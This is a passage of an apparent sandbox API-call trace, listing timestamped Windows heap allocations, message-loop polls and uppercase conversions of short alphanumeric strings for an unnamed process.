0x34a2048 [0188.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0188.023] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0188.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7acb) returned 0x34a2048 [0188.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0188.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7acb) returned 0x24df530 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0188.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0188.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0188.026] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.026] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0188.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.027] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.027] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.028] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0188.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.029] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0188.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0188.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.030] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0188.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.031] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0188.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.032] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.032] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.032] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.033] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.033] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.033] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.033] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0188.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.034] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0188.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.034] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.035] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.035] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 